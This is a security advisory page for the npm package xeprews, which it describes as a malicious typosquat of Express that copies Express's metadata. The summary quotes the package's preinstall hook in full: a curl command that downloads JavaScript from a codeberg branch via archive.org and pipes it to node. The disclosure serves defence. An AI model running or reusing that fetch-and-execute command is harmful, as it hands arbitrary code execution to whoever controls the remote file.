Logo
npm

xeprews@5.2.1

Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC

Malicious

OSV ID

MAL-2026-17248

Ecosystem

npm

Summary

xeprews is an Express typosquat whose package.json declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from a third-party mutable branch (no commit pin, no integrity check) and executing it under Node on the installer's machine at npm install time. The package impersonates expressjs/express by copying its author, repository, homepage, and description metadata, and ships only a stub index.js that re-exports './lib/express'; the impersonation is the lure that induces the install and thereby the remote code execution. Whoever controls the codeberg branch (or the archive.org replay of it) controls arbitrary code execution on every installer.

Source: amazon-inspector (17facf9b3612b1338fbda61069db829317150a9e7dbcc38cf96abbee1baa29b2)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.